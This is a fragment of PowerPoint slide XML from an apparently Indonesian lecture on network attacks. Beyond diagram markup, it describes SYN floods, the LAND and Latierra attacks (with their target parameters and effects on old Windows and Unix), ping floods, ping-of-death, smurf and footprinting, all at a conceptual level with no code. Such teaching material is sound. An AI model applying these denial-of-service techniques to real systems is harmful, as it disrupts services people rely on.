            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47130" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="1676400"/>
            <a:ext cx="762000" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47131" name="Line 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="1676400"/>
            <a:ext cx="762000" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47132" name="Line 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="2209800"/>
            <a:ext cx="1219200" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47133" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="2209800"/>
            <a:ext cx="1219200" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47134" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="2209800"/>
            <a:ext cx="1219200" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47135" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="2819400"/>
            <a:ext cx="1828800" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47136" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2819400"/>
            <a:ext cx="1828800" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47137" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="2819400"/>
            <a:ext cx="1828800" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47138" name="Line 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="3505200"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47139" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="3505200"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47140" name="Line 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="3581400"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47141" name="Line 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4114800"/>
            <a:ext cx="3352800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47142" name="Line 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4191000"/>
            <a:ext cx="3352800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47143" name="Line 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4267200"/>
            <a:ext cx="3352800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47144" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="4953000"/>
            <a:ext cx="4191000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47145" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="5029200"/>
            <a:ext cx="4191000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47146" name="Line 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="5105400"/>
            <a:ext cx="4191000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47147" name="Line 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="5638800"/>
            <a:ext cx="4953000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47148" name="Line 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="5715000"/>
            <a:ext cx="4953000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47149" name="Line 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="5791200"/>
            <a:ext cx="4953000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47150" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6019800"/>
            <a:ext cx="5435600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>Attacker utama melancarkan SYN floods dari beberapa tempat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i="1" smtClean="0"/>
              <a:t>Land attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Menggunakan program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>LAND, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t> no IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>dan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t> No Port Server (biasanya no port sistem windows =139)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sasaran:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Windows 95, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> hang dan tampil layar biru</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Windows NT,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> CPU menjadi sibuk 100%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unix versi lama, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> hang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i="1" smtClean="0"/>
              <a:t>Latierra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Pembaharuan dari </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>LAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Port yang digunakan berubah ubah</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Pengaman menjadi binggung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Ping flood attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>“ping” merupakan tools yang paling banyak digunakan untuk menguji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" smtClean="0"/>
              <a:t>connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Ping mengirimkan paket ICMP ECHO, yang dijawab dengan paket ICMP REPLY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Biasanya ping tidak difilter, disukai penyerang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Bagaimana kalau dikirimkan paket ICMP ECHO sebanyak-banyaknya?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Jenis Ping : ping-o-death dan ping broadcast (smurf)</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Ping-o-death</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ekploitasi program ping dengan memberikan ukuran paket yang lebih besar ke sasaran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Terdapat diberbagai sistem operasi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ukuran kecil dan tidak ada pengubah ukuran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Ping broadcast (smurf)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ping ke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>broadcast address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> dijawab oleh mesin yang berada pada jaringan tersebut. Di-abuse juga. Serangan ke ping broadcast disebut “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Seluruh komputer dialamat broadcast akan menjawab</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Foot printing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Internet/Intranet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Domain Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>TCP / UDP services pada setiap sistem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Arsitektur / OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SNMP, routing table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Remote access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Nomor telepon akses &amp; authentication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Pola smurf attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Rectangle 3"/>
          <p:cNvSpPr>
